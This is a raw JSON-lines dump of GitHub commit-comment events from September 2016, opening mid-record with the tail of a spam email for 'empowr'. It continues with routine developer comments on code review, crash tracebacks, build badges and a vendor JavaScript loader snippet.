!important;\n\nfont-size: 16px !important;\n}\n}\n\nJust a friendly reminder that anthony.miller.csn@gmail.com sent you $20 to try the all-new empowr:\n\nReceive your $20 &#9658;\n\nDon't know anthony.miller.csn@gmail.com?\n\nReturn the $20  so it doesn't go to waste and you're not keeping anthony.miller.csn@gmail.com waiting\n\nResources:\n\nWhat is empowr?\nWho's behind it?\nSee who you know that's on empowr\n\nNo more emails from anthony.miller.csn@gmail.com (anthony.miller.csn@gmail.com)? Unsubscribe\nhttp://profile.empowr.com/ApplicationManager/CommunityEmailSettings.aspx?em=K%2FzdUVCDppRybzAPzsRVnb09WcfocFNVzAotQYaRvebvNJtL8Pi2tdfFP8Nx4TBKt%2BpzVV6SrFbS71JGWnGIPGqh22irFPtkfWe4dwuRQFCYJozoZynyd2KcIHic9F5JcVSJEFZzTPzmccxHruEJGD4vgrCrACZu&vet=694&mlid=9014959248&fn=QpLpyL23t7HpRXkzIHngtg%3D%3D\n\n*This offer has been sent by anthony.miller.csn@gmail.com. By accepting this offer to try the new empowr, I stipulate that I'm 18 or older and am signing up having agreed with the product, terms and privacy policies, including the manner in which \"$\" and the word \"earnings\" are used throughout the empowr website, mobile apps and all empowr communications including this email, as defined in the product policy. This promotional email was sent to reply@reply.github.com and may contain special notices or offers. It is for illustrative purposes only and is in no way a guarantee. You can prevent future emails here. empowr - 501 West Broadway, Suite A182, San Diego, CA 92101, USA."}},"created_at":"2016-09-25T08:49:17Z"}
{"id":"4613911384","type":"CommitCommentEvent","actor":{"login":"yvolk"},"repo":{"name":"cotsog/andstatus"},"payload":{"comment":{"id":19162974,"position":null,"line":null,"path":null,"commit_id":"f4f6bb1d880405a9b08a272aeb958d97c9b5b16f","created_at":"2016-09-25T08:49:42Z","updated_at":"2016-09-25T08:49:42Z","body":"@cotsog Please see my note in https://github.com/andstatus/andstatus/issues/408 on the cause of the emulator failure"}},"created_at":"2016-09-25T08:49:42Z"}
{"id":"4613912148","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19162976,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-25T08:50:19Z","updated_at":"2016-09-25T08:50:19Z","body":"Excuse me but can we shut this shit down? I hate notifications from here"}},"created_at":"2016-09-25T08:50:19Z"}
{"id":"4613914568","type":"CommitCommentEvent","actor":{"login":"crpalmer"},"repo":{"name":"CyanogenMod/android_device_htc_pme"},"payload":{"comment":{"id":19162979,"position":null,"line":null,"path":null,"commit_id":"ee57d908023d86f3f11110312734ec76bb7957cd","created_at":"2016-09-25T08:52:34Z","updated_at":"2016-09-25T08:52:34Z","body":"That would be the long term idea, yes, but at the moment Sprint is not really supported (I keep hoping someone with a cdma device will figure out why it's not booting without forcing you guys to flash special firmware first)."}},"created_at":"2016-09-25T08:52:34Z"}
{"id":"4613916173","type":"CommitCommentEvent","actor":{"login":"nettee"},"repo":{"name":"killxin/GitHubRiverLake"},"payload":{"comment":{"id":19162980,"position":91,"line":91,"path":"document/GithubRiverLake游戏策划v0.1.md","commit_id":"8e7110be5efb7c15741d7a18bda0fe50f64efe4e","created_at":"2016-09-25T08:54:00Z","updated_at":"2016-09-25T08:54:00Z","body":"JavaScript是GitHub上最流行的语言，8层太少了 #3 "}},"created_at":"2016-09-25T08:54:00Z"}
{"id":"4613916998","type":"CommitCommentEvent","actor":{"login":"Emrikol01"},"repo":{"name":"Emrikol01/azure-create-dc-rg"},"payload":{"comment":{"id":19162982,"position":null,"line":null,"path":null,"commit_id":"073e9eba5b69357cab1d391b923f84057a3ce36d","created_at":"2016-09-25T08:54:42Z","updated_at":"2016-09-25T08:54:42Z","body":"cloning a create azure DC in a RG from GitHub: https://github.com/Azure/azure-quickstart-templates/tree/master/active-directory-new-domain"}},"created_at":"2016-09-25T08:54:42Z"}
{"id":"4613918058","type":"CommitCommentEvent","actor":{"login":"loftin110980"},"repo":{"name":"filepicker/filepicker-js-bower"},"payload":{"comment":{"id":19162983,"position":1,"line":1,"path":"filepicker_debug.js","commit_id":"7642b8fce904adf8441edf13f86021d684124ce2","created_at":"2016-09-25T08:55:36Z","updated_at":"2016-09-25T08:55:36Z","body":"script type=\"text/javascript\"> (function(a){if(window.filepicker){return}var b=a.createElement(\"script\");b.type=\"text/javascript\";b.async=!0;b.src=(\"https:\"===a.location.protocol?\"https:\":\"http:\")+\"//api.filestackapi.com/filestack.js\";var c=a.getElementsByTagName(\"script\")[0];c.parentNode.insertBefore(b,c);var d={};d._queue=[];var e=\"pick,pickMultiple,pickAndStore,read,write,writeUrl,export,convert,store,storeUrl,remove,stat,setKey,constructWidget,makeDropPane\".split(\",\");var f=function(a,b){return function(){b.push([a,arguments])}};for(var g=0;g<e.length;g++){d[e[g]]=f(e[g],d._queue)}window.filepicker=d})(document); </script>"}},"created_at":"2016-09-25T08:55:36Z"}
{"id":"4613919610","type":"CommitCommentEvent","actor":{"login":"Foreverasir"},"repo":{"name":"killxin/GitHubRiverLake"},"payload":{"comment":{"id":19162986,"position":91,"line":91,"path":"document/GithubRiverLake游戏策划v0.1.md","commit_id":"8e7110be5efb7c15741d7a18bda0fe50f64efe4e","created_at":"2016-09-25T08:56:51Z","updated_at":"2016-09-25T08:56:51Z","body":"可以调整，看来我们得爬虫一发，看看数据结果"}},"created_at":"2016-09-25T08:56:51Z"}
{"id":"4613921433","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19162991,"position":2,"line":2,"path":"resources/views/internlink/index.blade.php","commit_id":"b6bc11e820c16cd34a7f5f54e462bdf5db9df170","created_at":"2016-09-25T08:58:29Z","updated_at":"2016-09-25T08:58:29Z","body":"This probably shouldn't be in a commit haha"}},"created_at":"2016-09-25T08:58:29Z"}
{"id":"4613921535","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19162992,"position":5,"line":6,"path":"resources/views/internlink/results.blade.php","commit_id":"b6bc11e820c16cd34a7f5f54e462bdf5db9df170","created_at":"2016-09-25T08:58:35Z","updated_at":"2016-09-25T08:58:35Z","body":"or this"}},"created_at":"2016-09-25T08:58:35Z"}
{"id":"4613922146","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19162993,"position":null,"line":null,"path":null,"commit_id":"f8e3f06cc4d73ae9f8aa662be247df189cc9a8c4","created_at":"2016-09-25T08:59:08Z","updated_at":"2016-09-25T08:59:08Z","body":"4W練-2_categoryフォーム追加\r\nも含まれている"}},"created_at":"2016-09-25T08:59:08Z"}
{"id":"4613924486","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":19162995,"position":null,"line":null,"path":null,"commit_id":"209c058368cc669714e219d4366fc88135bea26f","created_at":"2016-09-25T09:00:58Z","updated_at":"2016-09-25T09:00:58Z","body":"@Yehonal  please look at this, Since i applied this string to windows i dont get the access violation crash"}},"created_at":"2016-09-25T09:00:58Z"}
{"id":"4613925010","type":"CommitCommentEvent","actor":{"login":"trejkaz"},"repo":{"name":"ExtraCells/ExtraCells2"},"payload":{"comment":{"id":19162996,"position":5,"line":18,"path":"src/main/resources/assets/extracells/lang/en_US.lang","commit_id":"7accd33461b623d34d081adbbf5dcb33356ae379","created_at":"2016-09-25T09:01:26Z","updated_at":"2016-09-25T09:01:26Z","body":"Naming gripe- by definition, all gases are also fluids, but now there is \"Gas Storage\" and \"Fluid Storage\", which is not really logical. Some of the fluids, e.g. steam, are gases too. So it's like the name \"Fluid\" is right, but the entire existence of \"Gas\" is dubious.\r\n"}},"created_at":"2016-09-25T09:01:26Z"}
{"id":"4613926821","type":"CommitCommentEvent","actor":{"login":"ShinDarth"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":19162999,"position":null,"line":null,"path":null,"commit_id":"209c058368cc669714e219d4366fc88135bea26f","created_at":"2016-09-25T09:03:00Z","updated_at":"2016-09-25T09:03:00Z","body":"@talamortis  can you open a PR with it? :D"}},"created_at":"2016-09-25T09:03:00Z"}
{"id":"4613930073","type":"CommitCommentEvent","actor":{"login":"yonbergman"},"repo":{"name":"noyg/eatwell"},"payload":{"comment":{"id":19163002,"position":11,"line":11,"path":"client/app/bundles/EatWell/components/Header/Header.jsx","commit_id":"e2a4bbfa9d17450f8c8b0ea4f51ecc3aa4620efe","created_at":"2016-09-25T09:06:01Z","updated_at":"2016-09-25T09:06:01Z","body":"I would suggest using classNames\r\nhttps://github.com/JedWatson/classnames"}},"created_at":"2016-09-25T09:06:01Z"}
{"id":"4613931881","type":"CommitCommentEvent","actor":{"login":"yonbergman"},"repo":{"name":"noyg/eatwell"},"payload":{"comment":{"id":19163005,"position":12,"line":12,"path":"client/app/bundles/EatWell/components/RestaurantFilters/RestaurantFilters.jsx","commit_id":"e2a4bbfa9d17450f8c8b0ea4f51ecc3aa4620efe","created_at":"2016-09-25T09:07:37Z","updated_at":"2016-09-25T09:07:37Z","body":"shouldn't this list be filled from the server?"}},"created_at":"2016-09-25T09:07:37Z"}
{"id":"4613932465","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163007,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:08:08Z","updated_at":"2016-09-25T09:08:08Z","body":"10:38:32.510 { D } Traceback (most recent call last):\r\n10:38:32.510 { D }   File \"/usr/lib/enigma2/python/Navigation.py\", line 240, in dispatchRecordEvent\r\n10:38:32.511 { D }   File \"/home/oe1/nightly53/build-enviroment/builds/openatv/release/gb7356/tmp/work/gbquadplus-oe-linux/enigma2-plugin-extensions-openwebif/1+gitAUTOINC+18c4ac00f1-r0/git/plugin/controllers/stream.py\", line 54, in requestWrite\r\n10:38:32.511 { D }   File \"/usr/lib/python2.7/site-packages/twisted/web/server.py\", line 220, in write\r\n10:38:32.511 { D }   File \"/usr/lib/python2.7/site-packages/twisted/web/http.py\", line 957, in write\r\n10:38:32.512 { D } AttributeError: 'NoneType' object has no attribute 'write'\r\n"}},"created_at":"2016-09-25T09:08:08Z"}
{"id":"4613933020","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163009,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:08:38Z","updated_at":"2016-09-25T09:08:38Z","body":"so please Rob - solve :)"}},"created_at":"2016-09-25T09:08:38Z"}
{"id":"4613937178","type":"CommitCommentEvent","actor":{"login":"iwean"},"repo":{"name":"samuraitruong/necro_socket"},"payload":{"comment":{"id":19163016,"position":null,"line":null,"path":null,"commit_id":"856a9173ce9fc36f3b6bc2d3a0fcab2df9023270","created_at":"2016-09-25T09:12:19Z","updated_at":"2016-09-25T09:12:19Z","body":"@samuraitruong \r\nCan you give a scroll button to this side bar? Thx..."}},"created_at":"2016-09-25T09:12:19Z"}
{"id":"4613937532","type":"CommitCommentEvent","actor":{"login":"noyg"},"repo":{"name":"noyg/eatwell"},"payload":{"comment":{"id":19163017,"position":12,"line":12,"path":"client/app/bundles/EatWell/components/RestaurantFilters/RestaurantFilters.jsx","commit_id":"e2a4bbfa9d17450f8c8b0ea4f51ecc3aa4620efe","created_at":"2016-09-25T09:12:40Z","updated_at":"2016-09-25T09:12:40Z","body":"Yup. Still placeholders..."}},"created_at":"2016-09-25T09:12:40Z"}
{"id":"4613939017","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19163020,"position":7,"line":296,"path":"backend/globaleaks/db/sqlite.sql","commit_id":"d40c18d91a6d0bedc2a925261a16bb176e0ed970","created_at":"2016-09-25T09:14:05Z","updated_at":"2016-09-25T09:14:05Z","body":"we love demorgan!"}},"created_at":"2016-09-25T09:14:05Z"}
{"id":"4613941549","type":"CommitCommentEvent","actor":{"login":"amithld"},"repo":{"name":"amithld/ProgrammingAssignment2"},"payload":{"comment":{"id":19163022,"position":15,"line":15,"path":"cachematrix.R","commit_id":"688ee0cc9f015bdc6cc9ae0aa8e5190559e228fe","created_at":"2016-09-25T09:16:15Z","updated_at":"2016-09-25T09:16:15Z","body":"SHA-1 Hash 688ee0cc9f015bdc6cc9ae0aa8e5190559e228fe"}},"created_at":"2016-09-25T09:16:15Z"}
{"id":"4613941847","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163023,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:16:33Z","updated_at":"2016-09-25T09:16:33Z","body":"Schimmel - do you have an idea? Otherwise i will try to solve next week."}},"created_at":"2016-09-25T09:16:33Z"}
{"id":"4613943125","type":"CommitCommentEvent","actor":{"login":"MCJohn117"},"repo":{"name":"buaadpy/ADSL"},"payload":{"comment":{"id":19163025,"position":1,"line":0,"path":"Language/C&C++/malloc与new对比.md","commit_id":"cd4e1e77112386b6407d1f321cc01f6eb48ca8f6","created_at":"2016-09-25T09:17:44Z","updated_at":"2016-09-25T09:17:44Z","body":"好厉害"}},"created_at":"2016-09-25T09:17:44Z"}
{"id":"4613943883","type":"CommitCommentEvent","actor":{"login":"mgudemann"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19163027,"position":4,"line":9,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-25T09:18:27Z","updated_at":"2016-09-25T09:18:27Z","body":"please remove DEBUG\r\n`<iostream>` is required in any case"}},"created_at":"2016-09-25T09:18:27Z"}
{"id":"4613944798","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19163028,"position":null,"line":null,"path":null,"commit_id":"e0b429c5f8f6dcdd1032a4f6fdde75ed6da604c1","created_at":"2016-09-25T09:19:16Z","updated_at":"2016-09-25T09:19:16Z","body":"Общее:\r\n1. Надо бы все пнг файлы в спрайт отправить(и крестик и тень и лейбл \"new\")\r\n2. По-прежнему сбивается форматирование http://joxi.ru/v29L5nNfG0RZMm\r\nIndex: \r\n1. http://joxi.ru/p27WD3oi0lno92 - съехали блоки, скорее всего у вас изменился размер container, соответственно размеры блоков или отступы у них тоже нужно изменить, и распределить их по всей ширине блока (то есть отступы у 4ых элементов), \r\n2. В верхнем хедере не поменяли блоки - http://joxi.ru/E2pzG9bFBn4aRr \r\n3. И здесь тоже http://joxi.ru/krDLn0xf0Pg44r\r\nCatalog:\r\n1. а здесь нет лейблов - http://joxi.ru/DrlvJ9pu4WGyn2"}},"created_at":"2016-09-25T09:19:16Z"}
{"id":"4613945254","type":"CommitCommentEvent","actor":{"login":"MCJohn117"},"repo":{"name":"buaadpy/ADSL"},"payload":{"comment":{"id":19163029,"position":1,"line":0,"path":"Algorithm/经典动态规划.md","commit_id":"8081e85b2513861ead7aca39f1f2ee8c90e492ea","created_at":"2016-09-25T09:19:40Z","updated_at":"2016-09-25T09:19:40Z","body":"太钓饵，看不懂"}},"created_at":"2016-09-25T09:19:40Z"}
{"id":"4613945337","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19163030,"position":null,"line":null,"path":null,"commit_id":"3367c4a6ef81d42be665dbc36177b75a937cf262","created_at":"2016-09-25T09:19:44Z","updated_at":"2016-09-25T09:19:44Z","body":"@KairusDarkSeeker Sorry, I'll revert this. It crashes for me on ClearSky. ;("}},"created_at":"2016-09-25T09:19:44Z"}
{"id":"4613949549","type":"CommitCommentEvent","actor":{"login":"rakuco"},"repo":{"name":"freebsd/pkg"},"payload":{"comment":{"id":19163034,"position":null,"line":null,"path":null,"commit_id":"71c69375dea1645415b165bff1ec88dff163af1a","created_at":"2016-09-25T09:23:23Z","updated_at":"2016-09-25T09:23:23Z","body":"Is a new `pkg-devel` release coming up any time soon? I've basically been unable to use `pkg audit -F` ever since moving to the latest, sandboxed releases (so for about a month)."}},"created_at":"2016-09-25T09:23:23Z"}
{"id":"4613950652","type":"CommitCommentEvent","actor":{"login":"Atyaf-dhari"},"repo":{"name":"gkhandelwal/HoneyBeeLoadBalancer"},"payload":{"comment":{"id":19163036,"position":null,"line":null,"path":null,"commit_id":"65d04f0b8eaaa71ef353cc3c1c92f446b2069356","created_at":"2016-09-25T09:24:22Z","updated_at":"2016-09-25T09:24:22Z","body":"Hi,  please what are the meaning of folders simulation files , simulation file normal and burst  \r\nin project ?"}},"created_at":"2016-09-25T09:24:22Z"}
{"id":"4613951525","type":"CommitCommentEvent","actor":{"login":"mauser"},"repo":{"name":"hydrogen-music/hydrogen"},"payload":{"comment":{"id":19163037,"position":null,"line":null,"path":null,"commit_id":"6259a9e9d95f570366c1c27da101fa8697e878f1","created_at":"2016-09-25T09:25:03Z","updated_at":"2016-09-25T09:25:03Z","body":"Hi! \r\n\r\nOk.. i would propose to add RAPTOR2 for the moment. Just to be sure: Have you also put ${RAPTOR2_INCLUDE_DIR} in src/core/CMakeLists.txt ? "}},"created_at":"2016-09-25T09:25:03Z"}
{"id":"4613953880","type":"CommitCommentEvent","actor":{"login":"imufun"},"repo":{"name":"imufun/CanyonBunnyMain"},"payload":{"comment":{"id":19163044,"position":null,"line":null,"path":null,"commit_id":"09bab56449315bc9f1736a751f851b34353135de","created_at":"2016-09-25T09:27:06Z","updated_at":"2016-09-25T09:27:06Z","body":"There is quite a lot going on in the preceding code, so let's break it down. First, notice that this class is using a design pattern called singleton. Simply put, a singleton class ensures that only a single instance of it will exist; hence the name singleton. This makes sense here because there is no reason to have multiple instances that point to the same resources. A singleton is implemented by defining a private constructor that prevents other classes from instantiating it. The instance variable holds the actual instance of the class. It uses the public static final modifiers that allows read-only access and is the one and only way to access this class. The staticness of this class allows us to access it from virtually anywhere in the game code without having to pass over its reference to every method where we will use it.\r\nA singleton can be implemented to do either lazy or eager initialization. Using lazy initialization means that the instance is created only when it is requested for the very first time. Any subsequent requests will always yield the exact same instance. In contrast, eager initialization means that the instance is directly created on startup."}},"created_at":"2016-09-25T09:27:06Z"}
{"id":"4613954013","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":19163045,"position":15,"line":15,"path":"system/controllers/users/actions/profile_edit_sessions.php","commit_id":"ce5d6254a8a58398f581c7254319c9dce79a4e9b","created_at":"2016-09-25T09:27:13Z","updated_at":"2016-09-25T09:27:13Z","body":"Да, спасибо, исправлю."}},"created_at":"2016-09-25T09:27:13Z"}
{"id":"4613955745","type":"CommitCommentEvent","actor":{"login":"ihororlovskyi"},"repo":{"name":"ihororlovskyi/ihororlovskyi.github.io"},"payload":{"comment":{"id":19163050,"position":3,"line":3,"path":"README.md","commit_id":"3f94dfcfa71f001c5195eda7396903a27426e0ec","created_at":"2016-09-25T09:28:48Z","updated_at":"2016-09-25T09:28:48Z","body":"Не :neckbeard: "}},"created_at":"2016-09-25T09:28:48Z"}
{"id":"4613956019","type":"CommitCommentEvent","actor":{"login":"catalin-hritcu"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":19163051,"position":null,"line":null,"path":null,"commit_id":"9c472a013eeebb116b9de703e0bddc02f916feaf","created_at":"2016-09-25T09:29:00Z","updated_at":"2016-09-25T09:29:00Z","body":"File name, maybe also module name. I normally don't use the F# version other than for bootstrapping."}},"created_at":"2016-09-25T09:29:00Z"}
{"id":"4613956301","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163052,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:29:15Z","updated_at":"2016-09-25T09:29:15Z","body":"seems to not stoptranscoding if you close the vlc-stream.\r\nstart transcoding on \"Das Erste HD\" and open it in VLC\r\nclose VLC - Transcoding should stop - but it doesn't\r\nstart transcoding again on \"Das Erste HD\" and open it in VLC\r\n=> crash\r\n"}},"created_at":"2016-09-25T09:29:15Z"}
{"id":"4613956446","type":"CommitCommentEvent","actor":{"login":"booksiri"},"repo":{"name":"booksiri/Java8Final"},"payload":{"comment":{"id":19163053,"position":null,"line":null,"path":null,"commit_id":"8105769ff88b134d0bea4d49b2a7f9714bde8e5d","created_at":"2016-09-25T09:29:23Z","updated_at":"2016-09-25T09:29:23Z","body":"eieiei"}},"created_at":"2016-09-25T09:29:23Z"}
{"id":"4613960900","type":"CommitCommentEvent","actor":{"login":"cdqwertz"},"repo":{"name":"cdqwertz/rpgtest"},"payload":{"comment":{"id":19163060,"position":null,"line":null,"path":null,"commit_id":"b2784e0bfc3ef01b161a4e0b6e4c70c49d6b70be","created_at":"2016-09-25T09:33:16Z","updated_at":"2016-09-25T09:33:16Z","body":"The creative mod will be replaced soon :)"}},"created_at":"2016-09-25T09:33:16Z"}
{"id":"4613961376","type":"CommitCommentEvent","actor":{"login":"nikswamy"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":19163061,"position":null,"line":null,"path":null,"commit_id":"9c472a013eeebb116b9de703e0bddc02f916feaf","created_at":"2016-09-25T09:33:42Z","updated_at":"2016-09-25T09:33:42Z","body":"I can't reproduce this with an OCaml build. However, I do get the parsing failure with the F# build. "}},"created_at":"2016-09-25T09:33:42Z"}
{"id":"4613962127","type":"CommitCommentEvent","actor":{"login":"erwinkramer"},"repo":{"name":"ozzi-/steamgroupwidget"},"payload":{"comment":{"id":19163064,"position":40,"line":29,"path":"steamgroup.php","commit_id":"7266973b8f2623dd698cf5719045902c7d90a0d3","created_at":"2016-09-25T09:34:26Z","updated_at":"2016-09-25T09:34:26Z","body":"@ozzi- \r\n**Thanks** for the security _fix_ 💯 . I needed this. 👍"}},"created_at":"2016-09-25T09:34:26Z"}
{"id":"4613963714","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19163067,"position":null,"line":null,"path":null,"commit_id":"3f4ed97ca9a46f84a8d987e2bb7c0958c29aebfa","created_at":"2016-09-25T09:35:53Z","updated_at":"2016-09-25T09:35:53Z","body":"\nBuild report #162544807 for sha 3f4ed97ca9a46f84a8d987e2bb7c0958c29aebfa:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-13.84%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3859%20/%2010048%20%2838.41%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-34.71%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-25T09:35:53Z"}
{"id":"4613963779","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19163068,"position":null,"line":null,"path":null,"commit_id":"0d60c459ff324cd460145f73215d28356d0a4e69","created_at":"2016-09-25T09:35:55Z","updated_at":"2016-09-25T09:35:55Z","body":"Perhaps you should try the values after 40k iterations to see if you are on the right track... usually 40k is sufficient for spsa tuning. "}},"created_at":"2016-09-25T09:35:55Z"}
{"id":"4613966591","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163072,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:38:32Z","updated_at":"2016-09-25T09:38:32Z","body":"re-instating the workaround prevents the crash, but also does not stop the first started Transcoding. With closed VLC the box itself still runs transcoding (i see on blinking of LED on my box)"}},"created_at":"2016-09-25T09:38:32Z"}
{"id":"4613966774","type":"CommitCommentEvent","actor":{"login":"thinkwee"},"repo":{"name":"thinkwee/BuptRoom"},"payload":{"comment":{"id":19163073,"position":null,"line":null,"path":null,"commit_id":"60ac792c3d5c85c7ce47ef5d857334e74883f759","created_at":"2016-09-25T09:38:44Z","updated_at":"2016-09-25T09:38:44Z","body":"版本迭代信息"}},"created_at":"2016-09-25T09:38:44Z"}
{"id":"4613966950","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19163074,"position":null,"line":null,"path":null,"commit_id":"0d60c459ff324cd460145f73215d28356d0a4e69","created_at":"2016-09-25T09:38:54Z","updated_at":"2016-09-25T09:38:54Z","body":"Sorry ignore previous comment... I somehow thought test was doing 80k iterations."}},"created_at":"2016-09-25T09:38:54Z"}
{"id":"4613968280","type":"CommitCommentEvent","actor":{"login":"ChrisOelmueller"},"repo":{"name":"unknown-horizons/unknown-horizons"},"payload":{"comment":{"id":19163075,"position":5,"line":172,"path":"horizons/world/concreteobject.py","commit_id":"a8c03613eacc9e4685c439da0626624c82d7ad44","created_at":"2016-09-25T09:40:02Z","updated_at":"2016-09-25T09:40:02Z","body":":hushed: "}},"created_at":"2016-09-25T09:40:02Z"}
{"id":"4613970160","type":"CommitCommentEvent","actor":{"login":"mgudemann"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19163081,"position":null,"line":null,"path":null,"commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-25T09:41:49Z","updated_at":"2016-09-25T09:41:49Z","body":"could we have an option (either to enable or to disable) for test case minimization?"}},"created_at":"2016-09-25T09:41:49Z"}
{"id":"4613970578","type":"CommitCommentEvent","actor":{"login":"yuvadm"},"repo":{"name":"daat-hamakom/maps"},"payload":{"comment":{"id":19163083,"position":null,"line":null,"path":null,"commit_id":"c178e732286c42f1537633a5125dfc0e2e66ad9c","created_at":"2016-09-25T09:42:11Z","updated_at":"2016-09-25T09:42:11Z","body":"@mushon done"}},"created_at":"2016-09-25T09:42:11Z"}
{"id":"4613971934","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"jcelliott/toniq"},"payload":{"comment":{"id":19163087,"position":null,"line":null,"path":null,"commit_id":"5be9e704ee66445fbb9538eeb52f9423baa71d49","created_at":"2016-09-25T09:43:16Z","updated_at":"2016-09-25T09:43:16Z","body":"I'm curious why these timeouts are needed (in case we should change something in Toniq for everyone)? Are your redis instance overloaded somehow?"}},"created_at":"2016-09-25T09:43:16Z"}
{"id":"4613972677","type":"CommitCommentEvent","actor":{"login":"squiddy"},"repo":{"name":"unknown-horizons/unknown-horizons"},"payload":{"comment":{"id":19163090,"position":5,"line":172,"path":"horizons/world/concreteobject.py","commit_id":"a8c03613eacc9e4685c439da0626624c82d7ad44","created_at":"2016-09-25T09:43:57Z","updated_at":"2016-09-25T09:43:57Z","body":"That diff coloring is confusing, I added an outer `list` for items. Still pretty annoying.. An alternative to `list(something.items())[0]` is probably `next(something.items())'."}},"created_at":"2016-09-25T09:43:57Z"}
{"id":"4613972848","type":"CommitCommentEvent","actor":{"login":"rockdaboot"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19163092,"position":75,"line":1748,"path":"src/psl.c","commit_id":"1baaacccd5e1349f12c32f57e4a5e7098525415c","created_at":"2016-09-25T09:44:06Z","updated_at":"2016-09-25T09:44:06Z","body":"Sadly no. 'tmp' does not include a zero termination - u8_tolower works with bytes, not with strings.\r\nMaybe there is similar function that works with strings ?"}},"created_at":"2016-09-25T09:44:06Z"}
{"id":"4613973024","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"jcelliott/toniq"},"payload":{"comment":{"id":19163093,"position":null,"line":null,"path":null,"commit_id":"b32df755896203d8ee6e930c17505e4e10950389","created_at":"2016-09-25T09:44:16Z","updated_at":"2016-09-25T09:44:16Z","body":"Same here, why do you need 120 seconds to load jobs? Are there a lot of them? Maybe it could load a few at a time since it won't be able to run all of them at once anyways?"}},"created_at":"2016-09-25T09:44:16Z"}
{"id":"4613973505","type":"CommitCommentEvent","actor":{"login":"LethalGhost"},"repo":{"name":"animusdev/Old-World-Blue"},"payload":{"comment":{"id":19163094,"position":null,"line":null,"path":null,"commit_id":"4a2b744f51dece916c068b920208e364b3e04604","created_at":"2016-09-25T09:44:46Z","updated_at":"2016-09-25T09:44:46Z","body":"Старый Блу, Полярис, последний Полярис.\r\nУ спрайтов в файлах удалены префиксы \"hair_\" и \"facial_\".\r\nСпрайты бород ушли в отдельный файл.\r\nСпрайты причесок рас ушли в отдельный файл.\r\nПорядок спрайтов в файлах совпадает с порядком описания спрайтов в коде."}},"created_at":"2016-09-25T09:44:46Z"}
{"id":"4613973637","type":"CommitCommentEvent","actor":{"login":"ArtStepanyuk"},"repo":{"name":"ArtStepanyuk/Portfolio"},"payload":{"comment":{"id":19163095,"position":1,"line":1,"path":"12050.txt","commit_id":"0ca3e94009566dd3201632611ea0b04445834cb6","created_at":"2016-09-25T09:44:56Z","updated_at":"2016-09-25T09:44:56Z","body":"13500"}},"created_at":"2016-09-25T09:44:56Z"}
